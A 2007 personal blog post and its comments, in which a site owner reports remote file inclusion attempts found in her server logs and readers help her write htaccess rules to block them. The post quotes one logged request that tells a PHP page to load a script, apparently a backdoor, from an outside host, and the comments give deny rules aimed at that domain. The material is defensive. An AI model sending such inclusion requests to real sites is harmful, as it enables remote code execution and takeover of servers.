Hack Attempt?

Sat, 17 March, 2007 – 1:19 am

After just running through my stats to see if there are any further holes I can close to limit bandwidth (yes I'm still on this subject!) I noticed the following had been visited in various guises

/pages.php?load=http://stoerlein.de/images/kgb.c?

Looking at the site that's referenced contains a whole web page mainly constructed of PHP (and Frontpage as the generator!!). However, naturally I'm concerned as it's not a hack I recognise. So far the attempts I've seen have just produced a 404, however, without knowing what this script does, it may run on the right (or in my case, wrong) file.

So now I'm trying to work out (and have already been for another reason too) how to use htaccess to read the REQUEST_URI and identify that if a certain string is contained within it then I can return a 403. Unfortunately I've not had much luck yet :(

It's worth checking your stats over once in a while. You never know what you may notice.

  1. 5 Responses to “Hack Attempt?”

  2. Hmm okay I got my first problem solved (after a day of searching and trying everything I could find or think of!). Yet the same method doesn't want to work for blocking this hack attempt.

    I have

    RedirectMatch 410 ^(.*)stoerlein.de.*$
    RedirectMatch 410 ^(.*)/trackback/$

    The second line works for any trackback URL on a post on this site (which have all been heavily spammed and are now just skewing my stats). However the first line doesn't do anything. I'm only guessing what the above means so it could be badly wrong!

    Anyone a htaccess expert out there?

    By Sarah on Mar 17, 2007

  3. That dot separating the TLD and domain name may need escaping

    By David Salisbury on Mar 19, 2007

  4. Further to that I'm not sure that you can use query strings with the various Redirect directives. You may need use something like this:

    RewriteEngine On
    RewriteCond %{QUERY_STRING} ^(.*)stoerlein.de.*$
    RewriteRule .* - [G]

    By David Salisbury on Mar 19, 2007

  5. Cheers Dave, I'll give that a go :)

    By Sarah on Mar 20, 2007

  6. Unfortunately the rewrite didn't work despite there being no reason for it not working. Probably the numerous other lines of spam blocking I have in my htaccess!

    Anyhow, PHP to the rescue and in good time as I've had 40 hits today alone with this script from various domains. Apparently it's a backdoor trojan according to a friend's firewall so clearly not a nice script. Still, it's blocked for now. I'll post up the code in the morning.

    I've also had to block visitors with empty user agents (sorry to anyone who has this but I've not spotted any in my server logs). The site was getting hammered today by some bot, so there's another block in place.

    It makes me wonder whether it's worth keeping the site running with receiving more bots than humans as visitors!

    By Sarah on Mar 20, 2007

Post a Comment

Please use your real name, nickname or an online name. Names I consider spam will be changed.

Stuff by Sarah is proudly powered by WordPress Entries (RSS) and Comments (RSS). Theme by Bob